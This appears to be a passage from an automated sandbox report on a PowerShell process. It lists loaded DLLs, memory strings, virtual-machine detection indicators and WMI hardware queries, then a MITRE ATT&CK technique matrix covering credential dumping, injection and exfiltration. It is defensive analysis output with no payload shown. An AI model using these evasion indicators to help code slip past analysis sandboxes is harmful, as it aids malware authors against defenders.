Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7u source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137049725010.000001CF43E3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgStrings source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137052660360.000001CF441A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: powershell.exe, 00000000.00000002.137051162289.000001CF4413C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?lib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32X source: powershell.exe, 00000000.00000002.137016391574.000001CF29DC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdby|001.8Mod source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE5548D2A5 pushad ; iretd 0_2_00007FFE5548D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE555A05E4 pushad ; retf 0_2_00007FFE555A05ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE555A00BD pushad ; iretd 0_2_00007FFE555A00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE555A7937 push ebx; retf 0_2_00007FFE555A794A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE555A2333 push eax; iretd 0_2_00007FFE555A233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE5567039B push eax; retf 0_2_00007FFE5567039C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE55817167 push eax; iretd 0_2_00007FFE5581716D

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9913Jump to behavior
Source: powershell.exe, 00000000.00000002.137017490133.000001CF2C90B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine I~U
Source: powershell.exe, 00000000.00000002.137053533993.000001CF444F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.137042985676.000001CF3BF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.137016391574.000001CF29E3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137052660360.000001CF441B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.137016391574.000001CF29E3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137052660360.000001CF441B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.137051162289.000001CF440D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote ServicesData from Local System1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
